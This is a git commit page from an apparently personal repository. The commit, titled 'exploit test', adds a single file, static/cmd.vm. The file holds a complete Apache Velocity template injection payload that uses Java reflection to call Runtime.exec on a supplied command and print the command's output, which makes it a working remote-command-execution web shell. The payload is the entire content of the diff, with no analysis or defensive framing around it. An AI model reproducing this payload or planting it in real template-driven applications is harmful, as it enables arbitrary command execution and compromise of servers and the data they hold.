~lord/krasovs.ky unlisted

ec243b74de9fa51954b1170cfafdf267b4735258 — Savely Krasovsky a month ago 3910f88
exploit test
1 files changed, 9 insertions(+), 0 deletions(-)

A static/cmd.vm
A static/cmd.vm => static/cmd.vm +9 -0
@@ 0,0 1,9 @@
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end
\ No newline at end of file